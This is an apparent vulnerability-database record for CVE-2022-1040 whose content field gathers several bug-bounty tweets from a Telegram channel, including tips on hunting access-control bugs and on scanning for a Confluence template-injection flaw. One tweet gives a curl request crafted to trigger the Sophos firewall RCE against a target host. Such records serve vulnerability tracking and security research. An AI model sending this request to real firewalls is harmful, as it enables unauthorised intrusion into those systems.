{"uuid": "6944f77e-f251-4ac1-9fa6-c7ca1627ae6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-1040", "type": "published-proof-of-concept", "source": "https://t.me/bhhub/789", "content": "#BugBountyTips of the Day\nScanning for Confluence - Remote Code Execution via OGNL template injection (CVE-2022-26134) using nuclei templates  Nuclei Template:  https://t.co/up3HhwQSfO  Confluence Advisory:  https://t.co/wIi0iPAish  #hackwithautomation #security #bugbounty #appsec  https://t.co/JzkV3JvS1i\n---\nI reached a solid milestone when it comes to bug bounties... In the last 30 days only I earned more than 100k$ in bounties. Never thought this will happen... hard work pays out! Thanks to PayPal, #Apple and my favourite private program on BC. #bugbounty\n---\nBroken Access Control:  #bugbounty and web #pentesting pro tips \ud83d\udcaa  When hunting broken access control issues, try this: 1.   First use EVERY exposed GUI function available 2.  Look for API docs and extract URLs  3.  Look for URLs in code 4.  Look for URLs in search engines\n---\nThe more I hack, the more I realise how important Coding/Dev knowledge is for the same and how much I suck at it\ud83e\udd72 #bugbountytips\n---\nCVE-2022-1040 RCE in Sophos firewall   curl --insecure -H \"X-Requested-With: XMLHttpRequest\" -X POST ' https://$host/userportal/Controller?mode=8700&amp;operation=1&amp;datagrid=179&amp;json=\\{\"\u1fb3&lt;ffff&gt;\":\"test\" \\}'  Nuclei template:  https://t.co/yn72HTKvmM  #bugbounty #infosec #bugbountytip\n---\nBug Bounty Tips  Explanation : What tool you can use for for whatever bug is it   Credit: Patrik  Tags: #cybersecurity #bugbounty #bugbountytips #hacking #security #offsec  https://t.co/ZBkZ5Gmn8j\n---\nBasic Linux Commands  Credit: @securitygull   #infosec #cybersecurity #pentesting #oscp  #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness  https://t.co/bfzXOAm55r", "creation_timestamp": "2022-06-20T08:50:14.000000Z"}